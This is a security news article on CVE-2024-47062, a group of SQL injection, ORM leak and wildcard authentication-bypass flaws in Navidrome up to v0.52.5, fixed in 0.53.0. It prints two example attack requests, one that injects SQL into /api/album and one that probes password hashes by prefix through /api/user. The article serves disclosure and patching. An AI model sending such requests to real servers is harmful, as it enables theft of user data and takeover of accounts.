CVE-2024-47062 (CVSS 9.4): Flaws Discovered in Navidrome Music Server Expose Sensitive Data
In a newly published security advisory, several critical vulnerabilities have been identified in Navidrome, a popular open-source music streaming server. These flaws, disclosed under CVE-2024-47062 with a high CVSS score of 9.4, pose a serious threat to users by enabling attackers to exploit SQL injection vulnerabilities and authentication weaknesses, potentially allowing unauthorized access to sensitive information.
Navidrome is a widely-used web-based music collection server, enabling users to stream their personal music libraries from any browser or mobile device, effectively acting as a self-hosted alternative to services like Spotify. However, this convenience comes with significant risks, as uncovered vulnerabilities in older versions of the software could allow attackers to compromise user data. The vulnerabilities were discovered by Louis Nyffenegger from PentesterLab.
Details of the Vulnerabilities
- SQL Injection Vulnerabilities
The most severe flaw involves multiple SQL injection points due to improperly escaped URL parameters. Attackers can craft malicious requests that inject arbitrary SQL code into the system. For example, sending a request like GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&SELECT+*+FROM+USER–=123 HTTP/1.1This allows attackers to retrieve sensitive information directly from the database, potentially exposing user data, including passwords and personal information. - ORM Leak
Another critical issue, termed the “ORM Leak,” occurs when parameters are automatically added to SQL queries through the URL, enabling attackers to guess encrypted passwords using brute-force techniques. A carefully crafted query could return partial results that allow attackers to extract encrypted passwords: GET /api/user?_end=36&_order=DESC&password=AAA%This query checks if passwords start with a particular string (e.g., ‘AAA’), providing an avenue for slow brute-force attacks. - Authentication Bypass Weakness
An authentication flaw allows users to bypass legitimate login credentials by exploiting the misuse of SQL LIKE statements. Instead of requiring a precise username match, attackers can log in using wildcard characters like%, effectively bypassing normal authentication mechanisms.
Impact of the Vulnerabilities
If successfully exploited, these vulnerabilities could allow attackers to gain unauthorized access to Navidrome databases, dumping sensitive data and bypassing security measures. The vulnerabilities could also enable attackers to brute-force encrypted passwords, gaining control over user accounts.
Affected Versions and Patches
The CVE-2024-47062 vulnerabilities affect Navidrome versions up to and including v0.52.5. Fortunately, the issue has been addressed in version 0.53.0, which patches these critical security holes. Users of the affected versions are strongly urged to update their software immediately to avoid exposure to potential exploits.
